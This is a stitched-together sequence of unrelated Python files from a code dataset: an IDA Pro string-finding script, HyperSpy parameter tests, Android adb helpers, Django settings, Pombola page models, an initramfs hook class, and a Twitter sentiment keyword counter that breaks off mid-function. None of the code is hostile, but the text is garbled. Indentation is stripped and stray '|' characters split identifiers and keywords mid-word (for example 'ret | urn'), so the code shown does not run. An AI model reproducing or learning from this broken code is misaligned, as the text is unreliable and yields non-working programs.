# Copyright 2017 The Johns Hopkins University Applied Physics Laboratory LLC
# All rights reserved.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
##############################################################################################
# make_strings.py
# Searches the user entered address range for a series of ASCII bytes to define as strings.
# If the continuous series of ASCII bytes has a length greater or equal to minimum_length and
# ends with a character in string_end, the scripts undefines the bytes in the series
# and attempts to define it as a string.
#
# Input: start_addr: Start address for range to search for strings
# end_addr: End address for range to search for strings
#
##############################################################################################
################### USER DEFINED VALUES ###################
min_length = 5 # Minimum number of characters needed to define a string
string_end = [0x00] # Possible "ending characters" for strings. A string will not be
# defined if it does not end with one of these characters
###########################################################
start_addr = AskAddr(MinEA(), "Please enter the starting address for the data to be analyzed.")
end_addr = AskAddr(MaxEA(), "Please enter the ending address for the data to be analyzed.")
if ((start_addr is not None and end_addr is not None) and (start_addr != BADADDR and end_addr != BADADDR) and start_addr < end_addr):
string_start = start_addr
print "[make_strings.py] STARTING. Attempting to make strings with a minimum length of %d on data in range 0x%x to 0x%x" % (min_length, start_addr, end_addr)
num_strings = 0;
while string_start < end_addr:
num_chars = 0
curr_addr = string_start
while curr_addr < end_addr:
byte = Byte(curr_addr)
if ((byte < 0x7F and byte > 0x1F) or byte in (0x9, 0xD, 0xA)): # Determine if a byte is a "character" based on this ASCII range
num_chars += 1
curr_addr += 1
else:
if ((byte in string_end) and (num_chars >= min_length)):
MakeUnknown(string_start, curr_addr - string_start, DOUNK_SIMPLE)
if (MakeStr(string_start, curr_addr) == 1):
print "[make_strings.py] String created at 0x%x to 0x%x" % (string_start, curr_addr)
num_strings += 1
string_start = curr_addr
break
else:
print "[make_strings.py] String create FAILED at 0x%x to 0x%x" % (string_start, curr_addr)
break
else:
# String does not end with one of the defined "ending char | acters", does not meet the minimum string length, or is not an ASCII character
break
string_start += 1
print "[make_strings.py] FINISHED. Created %d strings in range 0x%x to 0x%x" % (num_strings, | start_addr, end_addr)
else:
print "[make_strings.py] QUITTING. Entered address values not valid." |
dnjohnstone/hyperspy | hyperspy/tests/model/test_set_parameter_state.py | Python | gpl-3.0 | 4,051 | 0 | # -*- coding: utf-8 -*-
# Copyright 2007-2020 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
from hyperspy._signals.signal1d import Signal1D
from hyperspy.components1d import Gaussian
class TestSetParameterInModel:
def setup_method(self, method):
g1 = Gaussian()
g2 = Gaussian()
g3 = Gaussian()
s = Signal1D(np.arange(10))
m = s.create_model()
m.append(g1)
m.append(g2)
m.append(g3)
self.g1 = g1
self.g2 = g2
self.g3 = g3
self.model = m
def test | _set_parameter_in_model_not_free(self):
m = self.model
g | 1 = self.g1
g2 = self.g2
g3 = self.g3
m.set_parameters_not_free()
assert len(g1.free_parameters) == 0
assert len(g2.free_parameters) == 0
assert len(g3.free_parameters) == 0
def test_set_parameter_in_model_free(self):
m = self.model
g1 = self.g1
g2 = self.g2
g3 = self.g3
g1.A.free = False
g2.sigma.free = False
g3.centre.free = False
m.set_parameters_free()
assert len(g1.free_parameters) == len(g1.parameters)
assert len(g2.free_parameters) == len(g2.parameters)
assert len(g3.free_parameters) == len(g3.parameters)
def test_set_parameter_in_model1(self):
m = self.model
g1 = self.g1
g2 = self.g2
g3 = self.g3
m.set_parameters_not_free([g1, g2])
assert len(g1.free_parameters) == 0
assert len(g2.free_parameters) == 0
assert len(g3.free_parameters) == len(g3.parameters)
def test_set_parameter_in_model2(self):
m = self.model
g1 = self.g1
g2 = self.g2
g3 = self.g3
m.set_parameters_not_free()
m.set_parameters_free([g3])
assert len(g1.free_parameters) == 0
assert len(g2.free_parameters) == 0
assert len(g3.free_parameters) == len(g3.parameters)
def test_set_parameter_in_model3(self):
m = self.model
g1 = self.g1
g2 = self.g2
g3 = self.g3
m.set_parameters_not_free(parameter_name_list=['A'])
assert not g1.A.free
assert g1.sigma.free
assert g1.centre.free
assert not g2.A.free
assert g2.sigma.free
assert g2.centre.free
assert not g3.A.free
assert g3.sigma.free
assert g3.centre.free
def test_set_parameter_in_model4(self):
m = self.model
g1 = self.g1
g2 = self.g2
g3 = self.g3
m.set_parameters_not_free([g2], parameter_name_list=['A'])
assert g1.A.free
assert g1.sigma.free
assert g1.centre.free
assert not g2.A.free
assert g2.sigma.free
assert g2.centre.free
assert g3.A.free
assert g3.sigma.free
assert g3.centre.free
def test_set_parameter_in_model5(self):
m = self.model
g1 = self.g1
g2 = self.g2
g3 = self.g3
m.set_parameters_not_free()
m.set_parameters_free([g1], parameter_name_list=['centre'])
assert not g1.A.free
assert not g1.sigma.free
assert g1.centre.free
assert not g2.A.free
assert not g2.sigma.free
assert not g2.centre.free
assert not g3.A.free
assert not g3.sigma.free
assert not g3.centre.free
|
samini/gort-public | Source/Squiddy/src/tema-android-adapter-3.2-sma/AndroidAdapter/adbcommands.py | Python | apache-2.0 | 11,424 | 0.037728 | #
# Copyright 2014 Shahriyar Amini
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'shahriyar'
__copyright__ = 'Copyright 2014, Shahriyar Amini'
import subprocess
import re
import AndroidAdapter.utils as utils
"""
def focusedActivity(serial_id):
try:
output = subprocess.check_output(["adb", "-s", serial_id, "shell", "dumpsys", "activity"], stderr = subprocess.PIPE)
except subprocess.CalledProcessError:
return None
outputSplit = output.split('\n')
# sample
#mFocusedActivity: HistoryRecord{408238d8 com.metago.astro/.FileManagerActivity}
for line in outputSplit:
if (line.find("mFocusedActivity") >= 0):
lineSplit = line.split(' ')
retval = lineSplit[len(lineSplit)-1].rstrip('}\r\n')
return retval
return None
"""
# returns the device time in seconds since epoch
def deviceTime(serial_id):
if not serial_id:
ret | urn None
commandArray = ["adb", "-s", serial_id, "shell", "date", '+"%s"']
output = None
try:
output = | subprocess.check_output(commandArray, stderr = subprocess.PIPE)
except AttributeError:
output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
except subprocess.CalledProcessError:
pass
if output is None:
return None
return float(output)
def focusedActivity(serial_id):
tmp = recentActivities(serial_id)
if not tmp:
return None
if "mFocusedActivity" in tmp:
return tmp["mFocusedActivity"]
else:
return None
def pausingActivity(serial_id):
tmp = recentActivities(serial_id)
if not tmp:
return None
if "mPausingActivity" in tmp:
return tmp["mPausingActivity"]
else:
return None
def resumedActivity(serial_id):
tmp = recentActivities(serial_id)
if "mResumedActivity" in tmp:
return tmp["mResumedActivity"]
else:
return None
def lastPausedActivity(serial_id):
tmp = recentActivities(serial_id)
if not tmp:
return None
if "mLastPausedActivity" in tmp:
return tmp["mLastPausedActivity"]
else:
return None
def recentActivities(serial_id):
commandArray = ["adb", "-s", serial_id, "shell", "dumpsys", "activity"]
try:
output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
except AttributeError:
output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
except subprocess.CalledProcessError:
return None
outputSplit = output.split('\n')
keys = ['mPausingActivity', 'mResumedActivity', 'mFocusedActivity', 'mLastPausedActivity']
activities = dict()
for line in outputSplit:
for key in keys:
if (line.find(key) >= 0):
lineSplit = line.split(' ')
tmp = lineSplit[len(lineSplit)-1].rstrip('}\r\n')
# remove any 'slashes'
tmp = tmp.replace('/', '')
activities[key] = tmp
if (len(activities) > 0):
return activities
return None
# Most recent first in the list
# Running activities (most recent first):
# TaskRecord{40aa7610 #6 A com.yelp.android}
# Run #1: HistoryRecord{40a008c0 com.yelp.android/.ui.activities.ActivityHome}
# TaskRecord{4084ac80 #2 A com.android.launcher}
# Run #0: HistoryRecord{408bd8c0 com.android.launcher/com.android.launcher2.Launcher}
def runningActivities(serial_id):
commandArray = ["adb", "-s", serial_id, "shell", "dumpsys", "activity"]
try:
output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
except AttributeError:
output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
except subprocess.CalledProcessError:
return None
outputSplit = output.split('\n')
found = False
activities = list()
#count = 0
for line in outputSplit:
if not found:
if (line.find('Running activities') >= 0):
found = True
else:
tmp = line.strip(' \r\n')
#count += 1
#print count
if (tmp == ''):
break
if (tmp.find('HistoryRecord') >= 0):
tmpSplit = tmp.split(' ')
activities.append(tmpSplit[len(tmpSplit)-1].rstrip('}'))
if (len(activities) > 0):
return activities
return None
def getProp(serial_id, prop):
if prop is None or prop == "":
return None
commandArray = ["adb", "-s", serial_id, "shell", "getprop", prop]
output = None
try:
output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
except AttributeError:
output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
except subprocess.CalledProcessError:
return None
if output:
return output.rstrip('\r\n')
return None
def bootCompleted(serial_id):
return (bool(getProp(serial_id, "dev.bootcomplete")) and bool(getProp(serial_id, "sys.boot_completed")))
def keyboardShown(serial_id):
temp = getProp(serial_id,"keyboard.status")
if not temp:
return None
else:
value = temp.strip().lower()
if (value == "true"):
return True
elif (value == "false"):
return False
return None
# adb shell ps | grep com.newgt.musicbest | awk '{print $2}' | xargs adb shell kill
def processStatus(serial_id):
commandArray = ["adb", "-s", serial_id, "shell", "ps"]
output = None
try:
output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
except AttributeError:
output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
except subprocess.CalledProcessError:
return None
if output:
return output.rstrip('\r\n')
return None
def processId(serial_id, packageName):
if packageName is None or packageName == "":
return None
packageName = packageName.strip().lower()
psOutput = processStatus(serial_id)
psOutputSplit = psOutput.split('\n')
processInfo = None
pid = None
for process in psOutputSplit:
process = process.rstrip('\r\n').lower()
if (process.find(packageName) > 0):
# sample process
# u0_a69 5631 88 316884 48312 ffffffff 40072a40 s com.newgt.musicbest
processInfo = process
processInfo = re.sub(r'\s+', ' ', processInfo)
processInfoSplit = processInfo.split(' ')
pid = int(processInfoSplit[1])
return pid
def killProcess(serial_id, pid=None, packageName=None):
if (pid is None and packageName is None):
return None
# assign pid if it is None
if (pid == None):
pid = processId(serial_id, packageName)
# return if pid is still None
if (pid == None):
return None
return subprocess.call(["adb", "-s", serial_id, "shell", "kill", str(pid)])
def forceStop(serial_id, packageName):
stdout = subprocess.Popen(["adb", "-s", serial_id, "shell", "am", "force-stop", packageName], stdout=subprocess.PIPE).communicate()[0]
if stdout == '':
print "force stop succeed"
return True
else:
for cnt in range(5):
ret = killProcess(serial_id, None, packageName)
utils.wait(1)
if ret == None:
print "force stop succeed"
return True
print "force stop 5 times"
return False
def killADB():
commandArray = ["pkill", "-9", "-f", "adb"]
output = None
try:
output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
except AttributeError:
output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
except subprocess.CalledProcessError:
return None
return output
def startADB():
commandArray = ["adb", "start-server"]
output = None
try:
output = subprocess.check_output(commandArray, stderr = subprocess.PIPE)
except AttributeError:
output = subprocess.Popen(commandArray, stdout = subprocess.PIPE).communicate()[0]
except subprocess.CalledProcessError:
return None
return output
def restartADB():
killADB()
startADB()
def taintLog( |
sinnwerkstatt/landmatrix | config/settings/base.py | Python | agpl-3.0 | 7,018 | 0.000428 | import sys
import environ
from django.utils.translation import ugettext_lazy as _
BASE_DIR = environ.Path(__file__) - 3 # type: environ.Path
env = environ.Env()
env.read_env(BASE_DIR(".env"))
LANGUAGE_CODE = "en"
LANGUAGES = [("en", _("English")), ("es", _("Español")), ("fr", _("Français"))]
TIME_ZONE = "Europe/Berlin"
USE_I18N = True
USE_L10N = True
USE_TZ = True
SITE_ID = 1
ROOT_URLCONF = "config.urls"
WSGI_APPLICATION = "config.wsgi.application"
EMAIL_CONFIG = env.email_url("DJANGO_EMAIL_URL", default="consolemail://")
vars().update(EMAIL_CONFIG)
SERVER_EMAIL = EMAIL_CONFIG["EMAIL_HOST_USER"]
DEFAULT_FROM_EMAIL = SERVER_EMAIL
DATABASES = {"default": env.db("DATABASE_URL")}
INSTALLED_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.humanize",
"django.contrib.postgres",
"wagtail_modeltranslation",
"wagtail_modeltranslation.makemigrations",
"wagtail_modeltranslation.migrate",
"django.contrib.admin",
"django.contrib.sites",
# OL3 widgets must come before GIS
"apps.ol3_widgets",
"django.contrib.gis",
# wagtail and dependencies
"wagtail.contrib.modeladmin",
"wagtail.contrib.forms",
"wagtail.contrib.redirects",
"wagtail.contrib.settings",
# "wagtail.contrib.styleguide",
"wagtail.embeds",
"wagtail.sites",
"wagtail.users",
"wagtail.snippets",
"wagtail.documents",
"wagtail.images",
"wagtail.search",
"wagtail.admin",
"wagtail.core",
"wagtailorderable",
"apps.blog", # why here and not below?
"modelcluster",
"taggit",
"bootstrap3_datetime",
# 'treebeard',
"jstemplate",
"simple_history",
"crispy_forms",
"wkhtmltopdf",
"threadedcomments",
"django_comments",
"captcha",
"rest_framework",
"rest_framework.authtoken",
"rest_framework_gis",
"drf_yasg",
"django.contrib.syndication",
"file_resubmit",
# apps of the actual landmatrix project
"apps.message",
"apps.landmatrix",
"apps.grid",
"apps.map",
"apps.charts",
"apps.editor",
"apps.wagtailcms",
"apps.api",
"apps.notifications",
"apps.public_comments",
"apps.feeds",
"impersonate",
"celery",
# green new deal
"wagtail.api.v2",
"ariadne.contrib.django",
]
MIDDLEWARE = [
# "django.middleware.cache.UpdateCacheMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
# populate the history user automatically
"simple_history.middleware.HistoryRequestMiddleware",
# wagtail and dependencies
"wagtail.core.middleware.SiteMiddleware",
"wagtail.contrib.redirects.middleware.RedirectMiddleware",
"impersonate.middleware.ImpersonateMiddleware",
# "django.middleware.cache.FetchFromCacheMiddleware",
]
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [BASE_DIR("templates")],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages. | context_processors.messages",
"django.template.context_processors.i18n",
| "django.template.context_processors.media",
"apps.wagtailcms.context_processors.add_data_source_dir",
]
},
}
]
LOGIN_REDIRECT_URL = "/editor/"
# Limit all uploads to 20MB, and data sources to 1MB
MAX_UPLOAD_SIZE = 20971520
DATA_SOURCE_MAX_UPLOAD_SIZE = 10485760
DATA_SOURCE_DIR = "uploads" # appended to MEDIA_ROOT/MEDIA_URL
MEDIA_ROOT = BASE_DIR("media")
MEDIA_URL = "/media/"
STATIC_ROOT = BASE_DIR("static-collected")
STATIC_URL = "/static/"
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
# 'compressor.finders.CompressorFinder',
]
STATICFILES_DIRS = [
BASE_DIR("node_modules"),
BASE_DIR("frontend", "dist"),
]
STATICFILES_STORAGE = "django.contrib.staticfiles.storage.ManifestStaticFilesStorage"
FILE_UPLOAD_PERMISSIONS = 0o644
DATA_UPLOAD_MAX_MEMORY_SIZE = 4 * 1024 * 1024 * 1024
LOCALE_PATHS = [BASE_DIR("config/locale")]
CACHES = {
"default": env.cache("DJANGO_CACHE_URL", default="dummycache://"),
"file_resubmit": {
"BACKEND": "django.core.cache.backends.filebased.FileBasedCache",
"LOCATION": "/tmp/file_resubmit/",
},
}
COMMENTS_APP = "apps.public_comments"
WAGTAIL_SITE_NAME = "Land Matrix"
MODELTRANSLATION_CUSTOM_FIELDS = ("NoWrapsStreamField",)
# Django REST Framework settings
REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": (
"rest_framework.authentication.BasicAuthentication",
"rest_framework.authentication.SessionAuthentication",
)
}
IMPERSONATE = {
"REDIRECT_URL": "/editor/",
"REQUIRE_SUPERUSER": True,
"ALLOW_SUPERUSER": True,
"REDIRECT_FIELD_NAME": "next",
}
ELASTICSEARCH_URL = env("ELASTICSEARCH_URL", default="http://localhost")
try:
ELASTIC_INDEX_AB = open(".es_index_ab_switch", "r").read()
except FileNotFoundError:
open(".es_index_ab_switch", "w").write("a")
ELASTIC_INDEX_AB = "a"
ELASTICSEARCH_INDEX_BASENAME = env("ELASTICSEARCH_INDEX_NAME", default="landmatrix")
ELASTICSEARCH_INDEX_NAME = f"{ELASTICSEARCH_INDEX_BASENAME}_{ELASTIC_INDEX_AB}"
print(f"Using elasticsearch index {ELASTICSEARCH_INDEX_NAME}")
sys.stdout.flush()
# GreenNewDeal
OLD_ELASTIC = env.bool("OLD_ELASTIC", default=True)
NEW_ROUTES = env.bool("NEW_ROUTES", default=True)
# CELERY SETTINGS
BROKER_URL = "redis://localhost:6379/0"
CELERY_REDIS_BACKEND = BROKER_URL
CELERY_NAME = "landmatrix"
BLOG_LIMIT_AUTHOR_CHOICES_GROUP = "CMS Global (Editors)"
# django-registration
ACCOUNT_ACTIVATION_DAYS = 7
WKHTMLTOPDF_CMD = env("DJANGO_WKHTMLTOPDF_CMD", default="wkhtmltopdf")
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["127.0.0.1", "localhost"])
LANDMATRIX_INVESTOR_GRAPH_ENABLED = True
TWITTER_TIMELINE = (
{
"consumer_key": env("DJANGO_TWITTER_CONSUMER_KEY"),
"consumer_secret": env("DJANGO_TWITTER_CONSUMER_SECRET"),
"access_token": env("DJANGO_TWITTER_ACCESS_TOKEN"),
"access_token_secret": env("DJANGO_TWITTER_ACCESS_TOKEN_SECRET"),
}
if env("DJANGO_TWITTER_CONSUMER_KEY", default="")
else None
)
TWITTER_DEFAULT_USERNAME = "land_matrix"
TWITTER_DEFAULT_COUNT = 5
|
hzj123/56th | pombola/info/models.py | Python | agpl-3.0 | 6,304 | 0.005235 | import datetime
import lxml
from lxml.html.clean import Cleaner
import re
from django.conf import settings
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from markitup.fields import MarkupField
class ModelBase(models.Model):
created = models.DateTimeField( auto_now_add=True, default=datetime.datetime.now )
updated = models.DateTimeField( auto_now=True, default=datetime.datetime.now )
class Meta:
abstract = True
class LabelModelBase(ModelBase):
"""
The tags and categories are essentially the same thing in the database. Use
a common model for most of the fields etc.
"""
name = models.CharField(max_length=300, unique=True)
slug = models.SlugField(unique=True)
def __unicode__(self):
return self.name
class Meta():
abstract = True
ordering = ( 'name', )
class Category(LabelModelBase):
summary = MarkupField(blank=True)
class Meta():
verbose_name_plural = 'categories'
class Tag(LabelModelBase):
pass
class InfoPage(ModelBase):
"""
InfoPage - store static pages in the database so they can be edited in the
admin. Also simple blog posts.
There are several pages on a site that are static - ie they don't change
very often. However sometimes they need to change and it is conveniant to do
this via the admin, rather than editing the html on disk.
This module allows you to do that.
Each page has a slug - which is used to identify it in the url. So for
example if you had a site FAQ the slug might be 'faq' and its url would
become something like http://example.com/info/faq - where 'info' is where
these pages are stored.
Pages also have titles - which are shown at the top of the page.
Both slugs and titles must be unique to each page.
The content of the page is formatted using 'markdown' - which allows you to
include bulleted lists, headings, styling and links.
The page with the slug 'index' is special - it is used as the index page to
all the other info pages, and so should probably be a table of contents or
similar.
Pages can also be marked as 'blog' in which case they are presented in
newest first order on the '/blog' page, and on their own blog page.
"""
title = models.CharField(max_length=300, unique=True)
slug = models.SlugField(unique=True)
markdown_content = MarkupField(
blank=True,
default='',
help_text="When linking to other pages use their slugs as the address (note that these links do not work in the preview, but will on the real site)",
)
raw_content = models.TextField(
"Raw HTML",
blank=True,
default='',
help_text="You can enter raw HTML into this box, and it will be used if 'Enter content as raw HTML' is selected"
)
use_raw = models.BooleanField(
'Enter content as raw HTML',
default=False,
)
KIND_PAGE = 'page'
KIND_BLOG = 'blog'
KIND_CHOICES = (
(KIND_BLOG, 'Blog'),
(KIND_PAGE, 'Page')
)
kind = models.CharField(max_length=10, choices=KIND_CHOICES, default=KIND_PAGE)
# When was this page/post published. Could use updated or created but it
# makes sense to make this seperate now as it will facilitate queing up
# posts to be published in future easier.
publication_date = models.DateTimeField( default=datetime.datetime.now )
# Link to the categories and tags, use a custom related_name as this model
# can represent both pages and posts.
categories = models.ManyToManyField(Category, related_name="entries", blank=True)
tags = models.ManyToManyField(Tag, related_name="entries", blank=True)
def __unicode__(self):
return self.title
def css_class(self):
return self._meta.module_name
def name(self):
return str(self)
def _clean_html(self, html):
| cleaner = Cleaner(style=True, scripts=True)
return cleaner.clean_html(html)
@property
def content_as_html(self):
if settings.INFO_PAGES_ALLOW_RAW_HTML and self.use_raw:
# Parsing the HTML with lxml and outputting it again
# should ensure that we have only well-formed HTML:
parsed = lxml.html.fromstring(self.raw_content)
return lxml.etree.tostring(p | arsed, method='html')
else:
# Since there seems to be some doubt about whether
# markdown's safe_mode is really safe, clean the rendered
# HTML to remove any potentially dangerous tags first
return self._clean_html(self.markdown_content.rendered or '')
@property
def content_as_cleaned_html(self):
return self._clean_html(self.content_as_html)
@property
def content_as_plain_text(self):
cleaned_html = self.content_as_cleaned_html
cleaned_text = lxml.html.fromstring(cleaned_html).text_content()
return re.sub(r'(?ms)\s+', ' ', cleaned_text).strip()
def content_with_anchors(self):
""" Returns content with an anchor tag <a> inserted above every heading element
(the anchor name is the slugified heading text). For example:
<h2>Halt! Who goes there?"</h2>
becomes
<a name="halt-who-goes-there">
<h2>Halt! Who goes there?"</h2>"""
def prepend_anchor_tag( match ):
return '<a name="%s"></a>%s%s' % (slugify(match.group(2)), match.group(1), match.group(2))
headings_regexp = re.compile( '(<h\d+[^>]*>)([^<]*)')
return headings_regexp.sub( prepend_anchor_tag, self.content_as_html)
@models.permalink
def get_absolute_url(self):
if self.kind == self.KIND_PAGE:
url_name = 'info_page'
elif self.kind == self.KIND_BLOG:
url_name = 'info_blog'
else:
raise Exception("Unexpected kind '{0}'".format(self.kind))
return ( url_name, [ self.slug ] )
def get_admin_url(self):
url = reverse(
'admin:%s_%s_change' % ( self._meta.app_label, self._meta.module_name),
args=[self.id]
)
return url
class Meta:
ordering = ['title']
|
fearedbliss/bliss-initramfs | pkg/hooks/Hook.py | Python | apache-2.0 | 2,523 | 0 | # Copyright (C) 2012-2020 Jonathan Vasquez <jon@xyinn.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:/ | /www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pkg.libs.Tools import Tools
class Hook:
_use = | 0
_use_man = 0
_files = []
_optional_files = []
_directories = []
_man = []
@classmethod
def Enable(cls):
"""Enables this hook."""
cls._use = 1
@classmethod
def Disable(cls):
"""Disables this hook."""
cls._use = 0
@classmethod
def EnableMan(cls):
"""Enables copying the man pages."""
cls._use_man = 1
@classmethod
def DisableMan(cls):
"""Disables copying the man pages."""
cls._use_man = 0
@classmethod
def IsEnabled(cls):
"""Returns whether this hook is activated."""
return cls._use
@classmethod
def IsManEnabled(cls):
"""Returns whether man pages will be copied."""
return cls._use_man
@classmethod
def AddFile(cls, vFile):
"""Adds a required file to the hook to be copied into the initramfs."""
cls._files.append(vFile)
@classmethod
def RemoveFile(cls, vFile):
"""Deletes a required file from the hook."""
try:
cls._files.remove(vFile)
except ValueError:
Tools.Fail('The file "' + vFile + '" was not found on the list!')
@classmethod
def PrintFiles(cls):
"""Prints the required files in this hook."""
for file in cls.GetFiles():
print("File: " + file)
@classmethod
def GetFiles(cls):
"""Returns the list of required files."""
return cls._files
@classmethod
def GetOptionalFiles(cls):
"""Returns the list of optional files."""
return cls._optional_files
@classmethod
def GetDirectories(cls):
"""Returns the list of required directories."""
return cls._directories
@classmethod
def GetManPages(cls):
"""Returns the list of man page files for this hook."""
return cls._man
|
AdamDynamic/TwitterMetrics | KeywordSearch.py | Python | gpl-2.0 | 7,402 | 0.010267 | #!/usr/bin/env python
import MySQLdb
import string
import logging
import Reference as r
def CalculateWordCount(InputList,MatchList):
'''Counts the instance of MatchList values in the InputList'''
NumberOfMatches = 0
for w in InputList:
NumberOfMatches += MatchList.count(w)
return NumberOfMatches
def ReturnQueryAsList(cur, Query):
'''Runs a query on the database and returns the results as a list'''
cur.execute(Query)
ResultsTuple = cur.fetchall()
ResultsList = [row[0] for row in ResultsTuple]
return ResultsList
def SentenceToList(sentence):
'''Strips out punctuation and returns a list of words in the sentence'''
exclude = set(string.punctuation)
return (''.join(ch for ch in sentence if ch not in exclude)).split()
def GetSearchResults(cur):
'''Returns from the database the list of most recently searched tweets'''
# Select only those search terms that are new since the last search was performed
QUERY_SEARCHRESULTS_TEXT = "SELECT new." + r.SR_FIELD_SEARCHRESULT + " \
FROM " + r.DB_TABLE_SEARCHRESULTS_NEW + " AS new \
WHERE new." + r.SR_FIELD_TWEETID + " NOT IN( \
SELECT old." + r.SR_FIELD_TWEETID + " \
FROM " + r.DB_TABLE_SEARCHRESULTS_OLD + " AS old \
WHERE new." + r.SR_FIELD_TWEETID + " = old." + r.SR_FIELD_TWEETID + ");"
SearchResultsList = ReturnQueryAsList(cur, QUERY_SEARCHRESULTS_TEXT)
logging.debug(QUERY_SEARCHRESULTS_TEXT)
return SearchResultsList
def InsertResultsIntoDatabase(cur, TimeStamp, ResultsDict, TotalTweets, TotalWords):
'''Inserts the results of the keyword search back into the database'''
# Define the columns the values will be entered into
InsertResultsQuery = "INSERT INTO " + r.DB_TABLE_KEYWORDSRESULTS + " ( " + r.WL_FIELD_TIMESTAMP + ", " + r.WL_FIELD_POSITIVE + "\
, " + r.WL_FIELD_NEGATIVE + ", " + r.WL_FIELD_STRONG + ", " + r.WL_FIELD_HOSTILE + "\
, " + r.WL_FIELD_POWER + ", " + r.WL_FIELD_WEAK + ", " + r.WL_FIELD_ACTIVE + "\
, " + r.WL_FIELD_PASSIVE + ", " + r.WL_FIELD_PAIN + ", " + r.WL_FIELD_PLEASURE + "\
, " + r.WL_FIELD_TWEETSTOTAL + ", " + r.WL_FIELD_WORDSTOTAL + ") VALUES ('" + TimeStamp + "', " + str(ResultsDict['positive']) + "\
, " + str(ResultsDict['negative']) + ", " + str(ResultsDict['strong']) + ", " + str(ResultsDict['hostile']) + ", " + str(ResultsDict['power']) + "\
, " + str(ResultsDict['weak']) + ", " + str(ResultsDict['active']) + ", " + str(ResultsDict['passive']) + ", " + str(ResultsDict['pain']) + "\
, " + str(ResultsDict['pleasure']) + ", " + str(TotalTweets) + ", " + str(TotalWords)+ ");"
logging.debug(InsertResultsQuery)
cur.execute (InsertResultsQuery)
return True
def SearchTweetsForKeywords(TimeStamp):
'''Retrieves a twitter results from the database and scans them for keywords'''
FN_NAME = "SearchTweetsForKeywords"
ProcessResult = False
# Establish the connection to the database
db = MySQLdb.connect(
host=r.DB_HOST,
user=r.DB_USER,
passwd=r.DB_PASSWORD,
db=r.DB_NAME
)
cur = db.cursor()
QUERY_WORDLIST_POSITIVE = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'positive'"
QUERY_WORDLIST_NEGATIVE = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'negative'"
QUERY_WORDLIST_STRONG = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'strong'"
QUERY_WORDLIST_HOSTILE = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'hostile'"
QUERY_WORDLIST_POWER = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'power'"
QUERY_WORDLIST_WEAK = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'weak'"
